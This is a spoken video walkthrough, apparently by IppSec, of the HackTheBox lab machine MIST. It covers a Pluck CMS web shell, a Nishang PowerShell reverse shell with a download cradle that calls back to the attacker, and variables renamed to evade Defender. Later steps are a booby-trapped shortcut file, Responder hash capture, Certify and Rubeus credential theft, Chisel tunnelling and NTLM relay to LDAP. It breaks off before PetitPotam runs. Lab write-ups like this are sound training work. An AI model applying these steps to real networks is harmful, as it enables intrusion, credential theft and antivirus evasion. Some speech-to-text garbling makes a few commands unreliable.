What's going on YouTube? This is Ipsec. We're doing MIST from HackTheBox, which was an absolute beast of a machine. My favorite part about this box is definitely the NTLM Relay, which is part of the foothold, and it's made more difficult because domain users can't add machines or DNS entries to the domain. So it starts off with us using Rubeus as pass the ticket to get the NTLM hash of our current user because we gained access through social engineering and didn't know their password. And we needed a hash so we could authenticate to the domain through a SOCKS proxy. So with that hash, we can use PetitPotam to make the machine account reach back to us. And if we set up NTLM correctly, we can forward that authentication over to ldap because ldap signing isn't enabled. And that enables us to get a ldap connection as the computer account, which then will set shadow credentials so we can use Rubeus yet again to get the NTLM hash of the machine, which then through Kerberos will let us impersonate the administrator user to gain admin on that client. But that's not it. That's only for the user. In order to get root, there's a few things we have to do, but the key one is the ADCS ESC13 attack, which allows us to add specific AD groups to a ticket thanks to the OID group link as part of the ESC13. So with all that being said, let's just jump into the box because there's a lot to get through. As always, we're going to start off with an nmap. So -sc for default scripts, sv enumerate versions, -vv for double verbose. This can give us things like the TTL. OA output all formats, put in the nmap directory and call it MIST, then the IP address of 10.10.11.17. This can take some time to run, so I've already ran it. Looking at the results, we have just one port open, which is HTTP on port 80, and the banner tells us it's an Apache web server running on Windows, which is a little bit odd, and has PHP enabled. And also, if you have a keen eye, we have a TTL of 126. The default TTL on Windows is 128, and it decrements by 1 every hop. So most of the time when we come across a Windows box, we see a TTL of 127. This just means this is probably a VM on that box because we're missing whatever hop 127 is. If we send a straight ping to it, we see there is something that responds on 127. Nmap is just not showing it because all the ports show a TTL of 126. So we have a VM here. So if we end up compromising this, there's probably another host we can enumerate from this box. So before we get too far ahead of ourselves, let's just look at the rest of nmap. We have the HTTP robot script running that just has the contents, and there's a hint that there may be a data directory and a docs directory. Then we have the HTTP generator telling us that it's running pluck version 4.7.18, the title of the page, and it's requesting, when we navigate to 10.10.11.17, it directs us to file is equal to MIST. There's also a PHP session cookie, so we know this is a PHP web server. So let's just go ahead and take a look at the page. So we'll do HTTP, then the IP address. I already had the HTTP on my clipboard. And we just get a page that says it's powered by pluck. So we could try things like file disclosure in this file thing, but since we have the version, I'm just going to look at CVEs for this piece of software. Let's just Google CVE MITRE because this is the page I am familiar with. And then we can go over to search CVE list and then type pluck. And then let's see. I don't know when this version was released. Let's go back to the nmap and see if we can find out the release date. So we can just search for like pluck 4718 release and see when this was. We have CVEs. This is an RCE. That's interesting. Let's see. I wonder if we add GitHub, if this will have any type of release. There we go, releases. And then looks like 4.7.18 was released February 24th of 2023, so over a year ago. Looking at this RCE vulnerability, right off the bat, I see log on payload. So it looks like we need to be logged in for this to happen. So it's probably an authenticated RCE. And it's talking about uploading a zip file, maybe to like data modules. I don't know exactly how pluck works, but I'm guessing this requires authentication. It doesn't really tell us, but just based upon the login payload, I'd assume so. So let's look at all the CVEs for this. The first one here looks like it is probably a file disclosure. We can extract sensitive information. The next one here is, I'm surprised this is a CVE. It's saying it doesn't restrict login attempts after a lot of failed ones, so it's vulnerable to brute force. Probably not something in a HackTheBox machine. We have a file upload vulnerability that allows the attacker to execute code. This is probably the thing we were just looking at right here. And I'm looking for like the severity number because that could indicate if like authentication is required or not. Would that be here? No. I must be missing something because normally CVEs have like a criticality. So 8.8, that is high. I wonder if it doesn't require authentication. What does it use login payload? So we do login response. Nope. This is definitely requiring login because we're making sure the login is 200 when we send that. So let's see. The next one is cross-site scripting. And then let's see. Via the manage file. And it looks like we're talking about version 4717 or 4715. So we're no longer in what we're vulnerable to. So it's going to be one of these 4 CVEs. I'm going to start with the file disclosure. We probably should try this. If I was just doing the box blindly, I try this one just to make sure my assumption is correct. It's making sure we can log in, but I'm going to skip that to save a couple minutes. So we can search the CVE with pluck to see if there's any blog post about the CVE. And looks like we do have one here. So going to this page, it looks like there is a file disclosure vulnerability in the albums getimage.php. So let's make sure we have this script. So I'm going to just navigate to data modules getimage, and it can't be displayed because it contains an error. That's probably because the header is telling us it's an image and it doesn't have an image. So the browser's not responding or not displaying it. We can check that out with like curl-i to only show the headers, -v, this page. And let's see, we probably don't need -v when we do -i, right? Since that is to show headers. There we go. Content type, image JPEG. So whenever we hit get image, it tells us it's a JPEG, and if the browser can't render it, it displays an error message. But if we curled it, it wouldn't, right? So we could just do a curl on this, and there's no data. So that's why the browser's erroring. So let's keep going through the blog post. It gives us the source code to the get image thing, and we have a bunch of things detecting hacking attempts. So this is probably like a regular expression on looking for like directory traversal, because this is like ... or and then it's doing a bunch of other things. So that's probably like directory traversal, command injection, things like that. And it's checking it on looks like a few parameters, and then if no hacking attempts are found, it will include the settings module album and whatever the image is. And if we keep looking here, they try to include poc.php. So they probably have an upload to this directory. There's also a past backup.php here. So let's go ahead and look at that directory. So we go to data settings modules. So let's open a new tab, or just use this tab. And we can go data settings. Let's see, click on modules, albums. And then I think this is where we can include files. So there is a admin backup.php here. We can also include MIST.HTB. So if we just do, I think it's just image is equal to MIST.PHP, we get the contents of that, but obviously we want to get admin_backup. So let's go ahead and try downloading that. And looks like we get a hash. Let's do echo-n, paste this in, wc-c, 128. I'm going to guess this is a SHA-512 hash. If we echo test SHA-512 sum, that looks like the length, right? Let's just do a awk print 1 wc-c, 129, but there is a line break there. So yes, this is most likely going to be a SHA-512 sum. So let's go ahead and attempt to crack this. And instead of going to Hashcat, whenever I just get a raw hash, I always go to like crack station first. And if it doesn't crack here, then I'll try to manually crack it with Hashcat and some rules. But if there's no salt, I don't really see much harm in using an online service. So let's see, it wants all bridges, maybe. Yes, awesome. I'm not a robot. It looks like it cracks to LexiPoo97. So what we have to do now is figure out how to log in or use this password on Pluck. Now we could like go Buster and guess this, right? But Pluck is open source. So whenever there's an open source application, I do like going and just looking at the code. It saves me some time from just taking the blind approach and brute forcing it, right? So we have login.php. So let's go to login.php. And based upon the photo, we have a user of admin. So let's go there. And actually, if I clicked admin, that directs me to login. That's weird. I did not really expect that, but okay. That does not look like LexiPoo on my clipboard. Let's copy this, paste this, log in. Let's see, v notes. This is going to be pluck. No user, LexiPoo97. Okay. And let's see, we have to get code execution. Now, we could do it through whatever that CVE was that I found before the exploit script. But if we just go to manage modules, most CMSs, it's relatively trivial to get code execution when they support things like plugins or themes and things like that. They can just write PHP code. So let's go here and install module. So I'm going to create a shell script. So let's just create shell.php. And we can do a system request, then CMD like this. There we go. And then let's try uploading this. So we can go to HTTP. Oh, that's not it. HTTP MIST shell.php upload. And we didn't give it a valid file. So at this point, we could just guess and think it needs a folder, because a lot of times when you like make plugins, it wants folders. It also probably wants it to be a zip. So we can try make dir shell, move shell.php into shell, and then let's just zip this up. So zip-r, shell.zip. Okay. Then upload it. And it says the module has been installed successfully. And then directs us to manage modules. I'm going to go HTTP 10.10.11.17. Was it data modules, right? And we don't have shell. Did it not install? Install module. Let's try this again. So shell.zip, upload, has been installed successfully. There we go. I don't know what happened that one time, but if we go to shell, we have shell. And if we do cmd is equal to who am I, we get code execution. So let's now create a cradle to launch a reverse shell. So I'm going to make dir dub. We can go in there. And let's do cp user share nashang shells invoke PowerShell TCP one line.ps1. I'll just call it rev.ps1. And then let's edit this to get a shell. Okay, so we got to get rid of the IP. We'll do 10.10.14.8 and then listen on port 9001. And then before I start a web server, whenever I do PowerShell reverse shells, I always like creating some type of web cradle, because I'm going to have it go and download. I could just like give it raw base64 and execute the shell straight away. But normally I don't get error messages when I do this. So if like Defender blocks it, I never know Defender blocked it. If I do the web cradle and then it makes the HTTP request back to me, but I never get a shell, I know Defender blocked it. So that's why I always like favoring to use a web cradle like I'm about to do here. So do IEX, new object, net.web client, download string, HTTP, 10.10.14.8, port 8000, rev.ps1. There we go. I can do iconvert, cat cradle, iconvert, UTF-16, little endian, base64w0, because PowerShell just likes things encoded this way. Let's do Python 3, HTTP server. Then we can do rl wrap, nc lvnp 9001. And we can do PowerShell -enc for encoded command and run it. And it's taking a little while. We have it get the reverse shell, but we don't have any response. So chances are Defender flagged us. So what I'm going to do is edit my shell. So we're going to go edit rev.ps1. And it's relatively easy to bypass the Defender signature on shells. If you just rename all the variables, that normally works. You also have to delete one line, the print working directory line that we'll do in a second. So I renamed client. Let's rename stream. Oh God, not that. There we go. Let's see. The next one is bytes. We'll do that to $B. Then let's see. The next variable data $D. Next one is send back. We'll just do SB. Then I want to say there's send byte next. So send byte. We probably need this as a $. We'll call this SBY. Okay. I think I've renamed all the variables. Let's get rid of the PWD path here. And this should work to evade Defender. So start this back up. Refresh. We get A404 not found, so it looks like something cleaned up our shell. Let's just go manage modules again and reinstall. Or we can click install module. There we go. Shell.zip. Upload. Refresh. We should hit here and we get a callback. Awesome. So now we have a reverse shell here. So the next step we do is just like a simple who am I? And we can see we're the SVC web user. So I really don't like the guessing I'm about to do here, but I don't know a good way to showcase like what we're supposed to do. But if we look at the / directory, we have a common applications. So I do cd common applications. Let's make sure we're in it. Cd common star. It's a pain to escape that space. There we go. And we look in this directory, we have a few links. And we can write to these links. So this is just opening calculator, notepad, wordpad. So I'm going to manipulate the calculator link to send us a shell. And then we'll see if anyone clicks it. So it's a little bit of guesswork to guess that someone's going to click the shell. But yeah, so we'll do rlwrap nc lvmp 9001 to start our shell. And then we have to create a malicious shortcut. Wow, I can't say that word. I know the iRed team blog has a good one. So we'll do iRed team malicious shortcut. Go to Google. Let's see, this post is the one I normally use. And let's see. They do command start process. I just need, is this what I normally use? I think so. So we'll do object shell is equal to new object com object wscript.shell. Then we can create the link. So that's going to be object shell.create shortcut c:\/ applications, then calculator.lnk. Okay. Then we're going to set the target path is equal to, does this have PowerShell? It does. Awesome. Okay. Then we can do lnk.arguments is equal to, they have a few good ones here. So let's just add these. And then encoded command. Let's go back here, or iconvert command, grab this base 64. And this is why having the web cradle is so handy, because we can just reuse things like this. Okay, the argument's there. So let's just save the link. So before I do this, I'm going to type on calculator.lnk. And we can see it's just executing calc.exe. So I do lnk.save. Going to type it again. And we see PowerShell, and here's a nasty argument. So everything looks good here. Yeah, that should work, right? Because the web query is doing IEX on port 8000. So at this point, it becomes a waiting game for the callback to happen. And it should happen within, I think, like 2 minutes. So if we look at the time now, it is 5:25:46. So either in 10 seconds or probably a minute, 10 seconds, we should get it. So I'm just going to do a sleep 120 just so I know when 2 minutes has happened. And I'm going to probably pause the video now. And then if the sleep finishes, we know we screwed up. If it doesn't, or if we get a shell before the sleep, I will resume and we'll move on from whatever user clicks on that link. Almost soon as I stopped recording, we had a callback come, and then we got a shell. So let's do a who am I here? And we can see this user is MIST Brandon.Keywarp. And this shell is MS01 SVC web. So we're now a domain user. If we ran like an IP config, we can see the IP address is 192.168.100.101. And it should still be here because we clicked the link on the same machine, right? So what we need to do now is get the host name of this box. So, well, the host name is going to be MS01. We could just run host name. So let's now edit our host file, and we're going to start putting these hosts here. So this was 100.101. It is MS01. And then we need to get the domain. So I'm going to try pinging 192.168.100.100. Does this come back with anything? It does. So that is going to be another box. I just guessed that because we were 101, but that didn't get the host name. NS lookup 192.168.100.100. Does this give us anything? These commands are taking a little bit long to run. Let's see. DNS has timed out. Let's go with PowerShell get domain name. See, PowerShell get current domain. env. So we can try echoing this. There we go, MIST.HTB. Chances are that's going to be the domain controller. We can also ping MIST.HTB. That does respond to us. So this is going to be MS01, MS01.MIST.HTB. So we need to get the domain controller's name. I'm going to stand up chisel at this point. So let us do another link.save because I have a feeling we're going to need to get a few shells here. So I'm going to do rlwrap nc lvnp 9001. And I'm going to name this one tunnels. So eventually we'll get a hit there. So we have to upload chisel. So where's PWD? And I'm going to go to program data. And then we want to upload chisel to this box. So let's do cp opt chisel, chisel.exe to www. And I'm going to make it easy and copy chisel itself here. Okay. And then we can do a curl HTTP 10.10.14.8 port 8000 chisel.exe to chisel.exe. And let's go chisel server. I want to say we allow reverse and socks. Port 8001. Let's see. What is the command I normally use? Socks 5. Okay. We have a callback here. So I'm just going to do the chisel here, and we already downloaded it. So I'm going to do chisel.exe, client, then 10.10.14.8, port 8001, r:\sucks. And we should get that call back. So now we can run netexec. So I'm going to do nxc. We have to proxy chains it. Then SMB 192, 168, 100, 100. So we can get back to enumerating this way, right? And we can see the name is DC01 and it's MIST.HTB. So I'm going to do sudo v etc host, and we can say DC01, DC01.MIST.HTB, and also MIST.HTB to get all that squared away. We can also do 101. We could check like 102 for good measure to make sure everything's there. This one doesn't have a host. So at this point, we have to, I'm just going to kill that. I want to get Brandon's password. So I'm going to try to get the NTLM v2 hash and then crack it really quick. So I'm going to do sudo responder-i ton 0. As it responder.py, maybe responder lowercase. There we go. So I can just do like a GCI on 10.10.14.8, share file.txt. Doesn't have to exist. It's just going to make a connection back over to my server and then give us the hash, right? So here we can do a sudo v, or not v, sh to the Kraken, which is just a box on my network that I use to crack passwords. I'm going to go into the hashcat directory. Then we can say v hashes. I'm going to call this MIST NTLM v2. Paste this. /hashcat that opt word list rock u. And we'll do the rules of best64.rule. So we'll see if this cracks. I probably will not. And we can also run Bloodhound. So whenever I get a domain user, that's probably one of the first things I do. So let's go and run sharphound. And I'm going to default to sharphound here because number one, I had a lot of trouble getting the bloodhound.py working through the tunnel. And number two, we don't know the user's credentials, right? So if we just run sharphound from this user, we can get all the data we want. If we want to run the bloodhound.py locally, we need to know the user's credentials to authenticate, right? So having the exe just lets us skip having to know credentials. So I'm going to Google sharphound GitHub. And I think this is the latest, right? 5 days ago release. Yep, this looks good. Let's download the non-debug version. And then I want to put this in my www directory. So we'll wget it. 7zx on this. And that is sharphound.exe. Awesome. pwd, we're in program data. I'm going to do a wget http 10.10.14.8 8000 sharphound.exe sharphound.exe. Save that. And then if we try to execute it, let's just make sure it works. It's taking a while. Looks like it is. Yep, it looks like sharphound is working just fine. So I'm going to do a, what is it? Like -c all. This will do a collection for everything. And then we need to get the data back to us. So let's see. Looking at this, recovered 0 out of 1, so we don't have anything. We can go back to tunnels, cd ... Oh, we can just put in the www directory probably. That would be the easiest way to copy it, right? So if I do a dir, we have this data. So let's see, dir was at c:\\xampp htdocs. I have 3 P's. Okay. Then htdocs files. You can probably copy it there. So star.zip into that. If I go to 10.10.11.7 files, internal server error. So open directory listing is not happening, but the file is likely there as long as a user has permission, which they do, to drop it. Internal server error still. Okay. So let's not copy it to files. Let's do dir, htdocs. Can we just copy to htdocs? We can. There we go. And then we'll save it to HTB, MIST. Okay. So now we have to run Bloodhound. And I'm going to run the community version of Bloodhound because that's the one that is being up to date now. So let's go to, what is it? Example? Yeah, examples, Docker Compose. And I want to say it's Docker Compose :up, right? Bloodhound, GitHub, community. Let's see. If you haven't used the community edition of Bloodhound, it looks a lot different and quite a bit has changed. I know I showed it once in a video. I think it was like free. I forget what video it was, but I showed it once. And I found out the graphical issue, how to fix it. So we'll show that in this. Okay. And my computer is running a really odd version of Docker where I don't have Docker space compose. I have to do Docker -compose, but yours most likely is Docker space compose. So we're going to pull this. It's probably going to take, I don't know, 5 minutes to start Bloodhound. So I'm going to pause the video and then we'll resume once everything is running. Okay, it looks like the data has stopped scrolling to my screen. So Bloodhound should be running now. And since this is the first time running it, the initial password is going to be in standard out somewhere. So I just searched up and I find it here. So now if I go to my browser, we can do HTTP localhost 8080, which is where Bloodhound runs. And I'm going to, I'll turn it off once we log in. The first user is spam@example.com, which is such an odd default, but okay. And then we'll do password 2024 bang. It needs to be a capital P probably because we need one capital. There we go. And once we log in, we should be able to change the dark mode setting here to turn dark mode on. And I can turn it off here so they don't conflict. And now we have to go to file ingest and upload our file. So let's go into HTTP MIST, go to the bloodhound.zip, upload it, upload, and it's going to probably take, I guess, 2 to 3 minutes to process. So I'm probably going to pause the video again and we'll resume when this is done ingesting. Okay, it is now marked complete. So if we go over to Explore, we can start beginning to play with this. And the graphics, I guess on Linux, by default, they just like a bit wonky, at least on Firefox. If we go to About Config and we change a setting, it was resist fingerprinting. This privacy resist fingerprinting, if we change that to false, I don't know exactly what this does. It could be a horrible advice, but it makes Bloodhound look pretty again. So if you want it to look pretty, I would definitely recommend that. So now we have this Brandon.Keywarp user, and we can look at all the data Bloodhound tells us about them. If we go to members, we can see what we're a member of. We can mark it as owned. And then let's see. If we go to outbound control, see what things they can do. We can see I'm a member of domain users. I can enroll in these certificates. And then I can also enroll in, oh, that's not that interesting. But we have client auth, EFS, users, user authentication, and user signature. So if I wanted to, I can use a pass the ticket attack by enrolling in the user's template and then getting the NTLM hash that way. So let's use Certify to do that. So I'm going to go back to my session. Let's see, PWD, I'm in program data. So I'm going to copy. Let's see, if I go dub, we can copy opt, is it sharp collection? Then we'll do net framework 47 any, and then we want certify. So we'll copy that to this directory, and we can do a curl HTTP 10.10.14.8 port 8000 certify.exe and call it certify.exe. And then if we try to execute it, it does not run. And if we do a dir, it's actually probably going to get deleted somewhat soon. And that's because Defender is on the box and is responsible for deleting it. Or I thought it would get deleted soon. It'll be gone soon, definitely. And instead of doing a bunch of like obfuscation to get this working, playing around, I discovered the htdocs was actually excluded from antivirus. I was kind of curious like why antivirus was never picking up like the reverse shells I used. And it's just an excluded directory. And you can't really enumerate that as a low privilege user to my knowledge. You have to be an administrator. But a lot of times like database directories, web servers, sometimes they're just excluded from Defender. So we're going to skip a bunch of AV evasion because we can do that. What's going on? This is it from the future. And what I said just now about the low privilege user not having any ways to enumerate Defender exclusions, apparently that was a lie. The day after recording the video, I came across this article that just talks about 2 different ways we could do that. The first one is really cool. It's just looking at event logs because low privilege users can read this event log and it will contain a message about exclusions. The other one is going to be a tool. I'm not going to actually run it, but we'll talk about how it works at the end. I just want to focus again on the event logs because I love when attackers start getting information from event logs because I just love event logs. If you want tips on how to search event logs, go watch my Sherlock's videos like Brutus, Unit 42, or Crown Jewel, where we convert event logs to JSON, which really makes it easy to grep through them. But for an attacker, sometimes we don't have the event log and we're just going to use PowerShell to query them, right? And I have a shell as a low privilege user. To prove that, we're going to do a get MP preference, and then we'll select the object exclusion path. And if we were an admin, this command would work. But since we're not, it's going to tell us that we need administrative privileges. There we go. Must be an administrator to view exclusions. Well, okay. We can just go to the event log now. So I'm going to do the PowerShell command get win event. And we'll do log name. And the log name where Defender writes is Windows Defender, then operational. And if we just get this log, it's going to be a lot of data. It should finish in like 3, 2, 1. Okay, maybe not. But it's right now going through the event log and pulling a bunch of data. It'll flood my screen and there it is. And this has a lot of event IDs. We can see like 1000, 1005, 5007. So we only want to get 5007. So what I'm going to do is a filter X path. And we're going to say the system event ID is equal to 5007. Like this. And now we're only going to get 5007 events. It goes much quicker because we're not getting all those other event IDs. Now we can do select object on message, and then a format list will prevent it from truncating. How it has those like dots, and we can see a lot of data here, right? So if we just search this list for exclusion, we can see TP exclusions. We also see this one. Old value is nothing. New value, HKey local machine, software, Microsoft, Windows Defender exclusions, and paths. So here we go. We have a path here. I'm going to change my PowerShell command. Before I do the select object, we're going to add a where object, and then we'll say the message is like exclusion, like that. Close off that. And now we only get 2 events. We have the TP exclusions and this one. So I'm going to add a exclusions, then path. And now this will only give me 1 event that says where Defender has been configured. And we have the exclusion path examp.htdocs. So I find this really cool. The event logs are definitely useful for attackers. I know like a lot of the top teams used to be pillaging the event logs because like commands, like PowerShell commands that were ran were sometimes included in the event log. So that could give indications on like how boxes were built. That can lead them to quicker root and blood times. But I think we started like purging all those logs because it became an issue. But now we have Defender logs. So side rant there, but hopefully you enjoyed it. We can talk about the second way they enumerate it, which I think is a really creative way. So they can call mp run cmd to run a scan on this file, right? So they're scanning the folder and then they put a pipe star. And what happens is the pipe is an invalid character and it will just error if it attempts to scan a file with a pipe in it. However, if the folder the pipe is in is excluded, it never attempts to read the pipe. So in this example, if folder to check was excluded, it would not proceed to read this, so the command would never error out. However, if it's not excluded, it then reads this and says, hey, this is bad, right? And we can see the error message right here in this screenshot. So yeah, that is how we could enumerate the Defender rules as a low privilege user. And now let's get back to the video where we were trying to get Certify on the box so we can enroll a user authentication certificate for a user that enables us to do the pass the ticket hash and get the NTLM hash for the user. And go over to the HTDocs. And then I'm going to go into the files directory because we can write here. And this is not part of the automated cleanup. If we wrote to like where we wrote, I guess we could write to the root of the web server as well, but I'm going in files just because OPSEC reasons. I don't want to like leak a bunch of files just on the web root for other people to go download them, right? But we could do that if we put it in the directory where like the modules is, where we did the reverse shell. That gets cleaned up every like 2 to 3 minutes, which would be annoying for us. So we're going to just work out of this files directory from now on. So we can do curl http 10.10.14.8 port 8000 certify.exe, call it certify.exe, and then let's try to execute it. And there we go. We can now run Certify. So let's create a certificate. So we'll do certify.exe request. The CA is DC01, then MIST DC01-CA, and then we use the user template. So we have the thing completed. Oh, it needs to be lowercase ca. Okay. And then this will tell us how to use this ticket. So it may take probably 30 seconds, I guess, to run. And hopefully it runs successfully. There we go. We have the certificate here. I'm going to copy it on my clipboard. And then we're going to use the command it recommends to convert it into a PFX. So let's call this Brandon.Keywarp, I think. What is it? Let's see. What is the name of this? .pem, maybe? And yeah. So we'll paste the certificate. Then we will copy the command it says. And then we want to change the in to be Brandon.Keywarp.pem. And the PFX is just like how Windows wants to be able to deal with the certificate. I'm going to call it Brandon.Keywarp.pfx. And we'll copy this into www. We need to do it this way. Okay. And we want to get this certificate over to the server. So we're going to do a curl http 10.10.14.8 8000 Brandon.Keywarp.pfx -o Brandon.Keywarp.pfx. That was a 200, so we did save that. And we want to get Rubeus over to this server because the next step is going to be using Rubeus to perform that pass the ticket attack to get the NTLM hash of Brandon. And then that will just allow us to use tools through the proxy because we'll have Brandon's NTLM hash. So let's now cp opt sharp collection net framework 47ne rubeus.exe to www. And we're going to use a lot of .NET tools. That's why I didn't want to like go too heavy into just like opening the source code, changing a bunch of like text in the code to obfuscate it, to bypass Defender. Like you can normally just like delete the help and rename the project, and that's normally good enough. But to do that with all these .NET projects would probably take like an extra 45 minutes. It would just not good content. So this is a really nice saving grace. Okay, we have Rubeus. So Rubeus, we can do a ask for the ticket granting ticket, user Brandon.Keywarp. The certificate is going to be in C:. We probably don't have to do the full path. Let's just try Brandon.Keywarp.pfx. Then get credentials, show no wrap. Let's see. You must supply a... I did do certificate. Is it certificate colon? It is. So let's see if it can actually read that certificate. If it can't, then we need to put the full path there, but I'm guessing it'll work off current working directory. So this one, there we go. We have NTLM hash of Brandon.Keywarp. So we can go back up here where we did that nxc command, and let's do 101 Brandon.Keywarp -p, or it's -H for this hash. And let's see, we get a successful authentication. We can also try it against 100, but now we just have an auth, and having a single auth is definitely good. The next step is going to be relatively hard. It is going to involve a lot of like NTLM relaying, and we don't have the permission to create machines, which does make it much tougher. So if we use that nxc command, let's see, we want to use ldap, not SMB, and we can specify MAQ. This is going to tell us our machine quota is set to 0, so we can't add domains to the domain controller. And since we can't add like computers. Wait, what? Why did that fail? That's probably got to be .100. Because ldap is definitely not running on 101. It's running on 100. Okay. So machine account quota is 0. The other thing I should mention, if you're having issues, make sure you install Proxy Chains 4. I know 3 is default in a lot of locations. I just had weird issues with Proxy Chains 3. Switching to Proxy Chains version 4 fixed that. But yeah, so machine account quota is 0, so we can't create machines. The other thing that often happens with like relaying, why we want to create a machine is if we create the machine, we know the NTLM password of that machine so we can do things. The other thing is if we want to relay connections, we can potentially like create a DNS entry and point it back to us. And normally domain users have that permission, but we're going to try that really quick and find out we do not have that permission. So where is www? I'm going to download a tool called PowerMad, and that's going to give us that ability. So this is all just like normal enumeration I would do. And 9 times out of 10, this works. But on this box, it doesn't, right? So I just want to, again, show all the things that we would do. So we're not like skipping a bunch of enumeration. Powermad.ps1, paste that. Then we can do a curl HTTP 10.10.14.8 8000 powermad.ps1 out powermad.ps1 import module powermad.ps1 and let's see. Is it powermad ADIDNS node? Let's see. There's a really good website I use, the Hacker Recipes. This is a lot of good like AD attack stuff. So I would highly recommend if you're learning AD and want like burn all the things or hack tricks for a bunch of just like running commands, this is like a gold mine. So we use this new ADIDNS node. Let's do like this node. We'll call it IPSEC and then the data 10.10.14.8. And we just get the user has insufficient rights. So we can't create a new DNS record pointing it to us. And that is key because to do a lot of relaying, it involves Kerberos and you need to use DNS names. So the next step we have to do is figure out a good way to do this. And it is going to be a really tricky thing to do. And that's why I have this on a separate pane so we can get another shell. So we're going to do our lwrap nclvnp 9001 because we have to run chisel for a second time. Let's see, dir, does this shell still active? Please say the shell's active. It's probably not. And that's going to be a pain. I think we have to get a shell again. Going to copy this. We'll close that. VLNK. Wrong clipboard. There we go. Then 5. That looks right. Okay. We're already listening. Okay, I'm going to redo this to get a shell. So install module. I guess I could just like curl and download the shell there. That'd be a little bit quicker, probably. Yeah, let's do that. Because we may need to get this again. So pwd, so let's do a curl http 10.10.14.8 slash do we have the file nwww cp.shell.zip unzip 7zx mv shell.php. There we go. So we should now just be able to get shell.php off the root of the server. And as we saw, the Bloodhound data didn't get deleted, so data should not be deleted off of that. But did it not save? pwd, I'm there. Write it. dir. Find string shell. That is echo 1. Am I doing a 404? It is. Oh no. I just killed that shell. Okay, I have to do it the hard way now. Let's see. I'm thinking, should I pause the video and just spend the 5 minutes that takes off video doing this? This is one of the harder parts of the box, is managing all the shells. That's probably data, modules, shell.php. There we go. Let's copy shell.php. 1, 2, 3, 4. Did that do it? That looks better. Okay, so if I ever need to get a shell again, it won't be as painful. Okay, we have to switch back to Brandon. lnk.save. We should put that in this. Okay. So now we gotta wait for Brandon to click the link, and then we can move on, right? I guess we could have checked if Brandon has WinRM permission. So if we do WinRM, can we use Evil WinRM? No, we cannot. So we are stuck waiting for the shell to come back. So I'm going to pause the video and we will come back when I have a shell as Brandon. Okay, I got my shells set up. We're Brandon there. We're SVC web here. And there's one other piece I did not mention when we did our enumeration. If we go back to the net exec command, when we enumerated if we could add machines to domain, we can also do ldap-checker, and this is going to tell us if LDAP signing is enabled or not. And if it's enabled, then this attack will not work. We won't be able to do any type of relaying, but since LDAP signing is not enforced, we can do this relay attack. And this is going to get really complex because like the attack's going to involve relaying, which is a complex subject, and then we're going to just go like one step after another because it's a relatively long attack chain to do what we want to do. The end result is we're going to get the MS01 NTLM hash. That's going to allow us to essentially forge Kerberos tickets to say we're administrator and we can access the CIFS service, which is going to enable us to access the disk of MS01 to get the NTLM hash of local admin, which then allows us to, we're going to use WMI exec because PS exec gets picked up by Defender. Like that's why we want to get to this state. But to get to this state of getting MS01 NTLM, it is going to be somewhat complex because it is going to involve relaying to LDAP and shadow credentials and a bunch of other things. So let's try to explain it. And if I lose you, hopefully, like as we step through actually doing the attack, it's going to make sense. So let's draw it out. We're going to be the attacker. So ATK. And then we have the domain controller. So DC01. And then there's also MS01. This is the guy we have compromised, right? And through an attack called PetitPotam, Printrbug can also do it, but I think that's mostly patched. PetitPotam is the one most people use. You can force the service or the machine account to reach back to you. And because this is a server, the Webclient Service is installed because that's by default. I think it's going away in future builds, but we can turn this request into a web DAV request. And that's key because if this was just SMB, the only thing we could relay to DC01 would be another SMB thing. And since SMB signing is enabled, we can't relay it. But because we can force MS01 to make a web DAV request to us, when we relay to DC01, that enables us to also attack protocols like SQL or LDAP. SQL is not installed, so that one's out of the picture. But LDAP is. So we get authenticated to DC01 via LDAP. And since we're the MS01 account, we'll be able to upload a certificate that lets us authenticate as MS01. And then we can use Rubeus, just like we did with the Brandon user, in order to get the NTLM password of MS01, which then will enable us to masquerade as the administrator user, essentially. So It's going to be a little bit more difficult than this because we can't create DNS entries. If we could create a DNS entry that points to us, then it would work just like this. But because we can't, we have to do a little bit of trickery with network routing. So what we're going to do is stand up a listener using Chisel. It's going to be just a regular forward, I guess. We don't use it that often in attacking, right? But we're going to listen on port 5050. And all that traffic is going to get sent back to us on port 8080, or port just 80, not 8080. And the reason why we're doing that is because when we do PetitPotam, we're going to use MS01 as the host name and point it at port 5050. So it goes back to itself, says, oh, I'm going to MS01, goes through this tunnel, and then we get the connection. And then we have a SOCKS proxy that goes through MS01 that enables us to talk to DC01 as ldap, right? And then we do the clear credential attack in order to gain access. So that's essentially what we're going to be doing. Hopefully it makes sense. If it doesn't, before you watch it like 5 times or my explanation 5 times, let's see if it makes sense as we like step through all the commands. So first things first, I'm going to set up the tunnel to go on port 8080. If I do who am I, yes, this session is live. So I think Chisel was in program data, right? If I do dir, we do have Chisel. So I'm going to do /chisel.exe. And then we're going to do client 10.10.14.8, 8001. We're going to listen on port 5050, send it through the tunnel to 127.0.0.1.80. So I'm waiting for this session to say it is alive. We should get that momentarily. Why is that not? It's a bit odd. Netstat-an, find string 5050. It is listening. So what I'm going to do real quick, let's just listen on port 80 to verify this tunnel is up. So if I do a curl on 127.0.0.1 port 80, we probably have to specify HTTP. Please work. No, 5050. So we're going to go through the tunnel, right? So 5050. And yes, we get it. And remember, this is on the host, so it's not like me running curl on my attacker box. I'm running it on the host 127.0.0.1. We went through Chisel. So that tunnel is set up. So the next thing we have to do is get a special version of Impacket because what we have is not going to be compatible. Or like the main version of Impacket doesn't have the feature set we want. So we're going to do Impacket GitHub. And then we're going to go to pull request and search for shadow. So pull request. Then we're going to search shadow. And then we're going to grab this branch. And then there's a funny comment here. We are here from HTTP MIST. But let's go ahead and grab this. So we'll do a git clone on this, and we'll specify the branch. Can I just copy this? We'll just type it. Interactive ldap shadow creds. Interactive ldap shadow creds. Okay. And then we want to install this. So I'm going to do this all from the root user because we'll have to listen. The NTLM Relay eventually will have to listen on port 80. So it makes sense to be root from here on. So I'm going to do sudo su. Actually, let's do it on a new pane. So this will be, we'll call this relay. So let's go into Impacket. Let's do sort python3-m vm.vm. So we're going to build a bunch of Python tools here. So bin activate. And then I was probably in dub when I copied that, right? Yeah. Let's move Impacket here. Okay, we can do pip3 install dot. And I think NTLM Relay is a part of Impacket. It could be part of a different one. Let's see. Find dot grep NTLM Relay. Let's see. NTLM. I think that's good. So that's set up. So what we're going to have to do is stand up our relay. So to do that, I'm going to say proxy chains, NTLM relayx. Let's do proxy chains here. And then I'm going to add the debug flag. We're going to forward everything to ldap s 192.168.100.100. Go interactive, SMB2 support, and the domain we'll specify as MIST.HTB. So what this does, it stands up our listener, and when we get a webdav request on port 80, it's going to forward that over to ldap. So proxy chains is set up. Now, the next piece we have to get is PetitPotam. 